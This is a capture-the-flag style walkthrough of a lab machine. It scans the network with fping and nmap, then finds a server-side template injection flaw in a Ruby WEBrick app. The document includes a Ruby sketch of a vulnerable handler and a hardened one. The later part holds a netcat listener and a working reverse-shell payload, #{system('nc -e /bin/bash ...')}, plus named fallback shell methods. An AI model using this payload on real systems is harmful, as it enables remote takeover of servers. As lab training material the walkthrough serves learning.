IP Address

❯ fping -aqg 10.0.0.0/24
10.0.0.1
10.0.0.2
10.0.0.3
10.0.0.4
10.0.0.160

Nmap Scan

❯ nmap -T4 -sC -sV -p- -oN nmap.log 10.0.0.160
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-31 12:36 +0545
Nmap scan report for 10.0.0.160
Host is up (0.00080s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 ee71f4ada071e1351986abc8e6be3617 (RSA)
|   256 401cc3da83d72f60cb12473b02670414 (ECDSA)
|_  256 1a69a7f9dca549ffd27dce45976d8ab9 (ED25519)
8000/tcp open  http    WEBrick httpd 1.6.1 (Ruby 2.7.4 (2021-07-07))
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-server-header: WEBrick/1.6.1 (Ruby/2.7.4/2021-07-07)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap shows a WEBrick Ruby application on port 8000. WEBrick is the simple HTTP server library bundled with Ruby, so what is listening there is most likely a small custom Ruby app rather than a full framework.

Check port 8000

The homepage has a text input that echoes the submitted data back into the page.

Reflected input on a Ruby server is a strong candidate for server-side template injection: if the input is dropped into a template or an evaluated string instead of being treated as data, Ruby interpolation syntax (#{...}) inside the input is executed on the server. Let's check.

SSTI (Server Side Template Injection)

Proof

The usual check is to submit a harmless expression such as #{7*7}: if the response contains 49 rather than the literal text, the input is being evaluated as Ruby code.

Since evaluated Ruby can call system, the same injection point will give us a reverse shell.
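To make the mechanism concrete, here is an added example in Ruby (not the box's actual application, whose source is not shown on this page): a hypothetical handler that splices the input into Ruby source and evaluates it, so #{...} in the input runs on the server; the 7*7 probe run against it; and a hardened handler that treats the input as data and HTML-escapes it. The function names and the "Hello, " prefix are assumptions.

```ruby
require 'cgi'

# Hypothetical stand-in for the vulnerable handler (an assumption, not the
# box's real code). The user input is spliced into the Ruby source of a
# double-quoted string literal and then eval'd, so any "#{...}" in the input
# is interpolated, i.e. executed as Ruby, on the server.
def render_vuln(input)
  src = "\"Hello, #{input}\""   # input '#{7*7}' gives the source "Hello, #{7*7}"
  eval(src)                      # interpolation runs here; a stray '"' in the
end                              # input would raise a SyntaxError instead

# Hardened form: the input is never evaluated, only escaped and concatenated,
# so '#{7*7}' is returned literally and HTML metacharacters are neutralised.
def render_safe(input)
  'Hello, ' + CGI.escapeHTML(input)
end

# SSTI probe: submit an arithmetic expression that only evaluation would
# compute and check whether the result, not the literal, is reflected.
def interpolation_injectable?(render)
  probe = '#{7*7}'
  out = render.call(probe)
  out.include?('49') && !out.include?(probe)
end

if __FILE__ == $0
  puts render_vuln('#{7*7}')                             # Hello, 49
  puts render_safe('#{7*7}')                             # Hello, #{7*7}
  puts interpolation_injectable?(method(:render_vuln))   # true
  puts interpolation_injectable?(method(:render_safe))   # false
end
```

The probe deliberately checks both that 49 appears and that the literal #{7*7} is gone, so a page that merely echoes the payload is not mistaken for a vulnerable one.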

Netcat listener:

❯ nc -nlvp 9001
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001

The payload submitted through the same text input is:

#{system('nc -e /bin/bash 10.0.0.4 9001')}

Two practical caveats: if the payload is sent in a GET query string, the leading # must be percent-encoded as %23, otherwise the client treats everything after it as a URL fragment and the server never sees it; and nc -e only exists in some netcat builds (the OpenBSD variant lacks it), in which case a bash /dev/tcp redirection or an mkfifo-based shell is the usual fallback.

Shell